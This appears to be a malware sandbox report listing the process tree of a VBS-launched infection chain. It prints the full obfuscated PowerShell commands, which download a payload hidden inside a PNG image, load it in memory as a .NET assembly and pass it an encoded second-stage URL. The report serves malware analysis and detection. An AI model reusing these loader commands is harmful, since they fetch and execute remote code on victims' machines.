| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\kwen.vbs

    2536
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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ZQSeUGEvAbfwTjZQSeUbgBkvAbfwTjZQSeUCvAbfwTjZQSeUvAbfwTjZQSeUJvAbfwTjZQSeUBlvAbfwTjZQSeUG4vAbfwTjZQSeUZvAbfwTjZQSeUBJvAbfwTjZQSeUG4vAbfwTjZQSeUZvAbfwTjZQSeUBlvAbfwTjZQSeUHgvAbfwTjZQSeUIvAbfwTjZQSeUvAbfwTjZQSeUtvAbfwTjZQSeUGcvAbfwTjZQSeUdvAbfwTjZQSeUvAbfwTjZQSeUgvAbfwTjZQSeUCQvAbfwTjZQSeUcwB0vAbfwTjZQSeUGEvAbfwTjZQSeUcgB0vAbfwTjZQSeUEkvAbfwTjZQSeUbgBkvAbfwTjZQSeUGUvAbfwTjZQSeUevAbfwTjZQSeUvAbfwTjZQSeU7vAbfwTjZQSeUCQvAbfwTjZQSeUcwB0vAbfwTjZQSeUGEvAbfwTjZQSeUcgB0vAbfwTjZQSeUEkvAbfwTjZQSeUbgBkvAbfwTjZQSeUGUvAbfwTjZQSeUevAbfwTjZQSeUvAbfwTjZQSeUgvAbfwTjZQSeUCsvAbfwTjZQSeUPQvAbfwTjZQSeUgvAbfwTjZQSeUCQvAbfwTjZQSeUcwB0vAbfwTjZQSeUGEvAbfwTjZQSeUcgB0vAbfwTjZQSeUEYvAbfwTjZQSeUbvAbfwTjZQSeUBhvAbfwTjZQSeUGcvAbfwTjZQSeULgBMvAbfwTjZQSeUGUvAbfwTjZQSeUbgBnvAbfwTjZQSeUHQvAbfwTjZQSeUavAbfwTjZQSeUvAbfwTjZQSeU7vAbfwTjZQSeUCQvAbfwTjZQSeUYgBhvAbfwTjZQSeUHMvAbfwTjZQSeUZQvAbfwTjZQSeU2vAbfwTjZQSeUDQvAbfwTjZQSeUTvAbfwTjZQSeUBlvAbfwTjZQSeUG4vAbfwTjZQSeUZwB0vAbfwTjZQSeUGgvAbfwTjZQSeUIvAbfwTjZQSeUvAbfwTjZQSeU9vAbfwTjZQSeUCvAbfwTjZQSeUvAbfwTjZQSeUJvAbfwTjZQSeUBlvAbfwTjZQSeUG4vAbfwTjZQSeUZvAbfwTjZQSeUBJvAbfwTjZQSeUG4vAbfwTjZQSeUZvAbfwTjZQSeUBlvAbfwTjZQSeUHgvAbfwTjZQSeUIvAbfwTjZQSeUvAbfwTjZQSeUtvAbfwTjZQSeUCvAbfwTjZ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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vAbfwTjZQSeU','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2648
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmdvZWVnbmsvMTUuMzMuMjQuMzkxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2768

Process contents

No process loaded Click on a process in the tree above to load its data.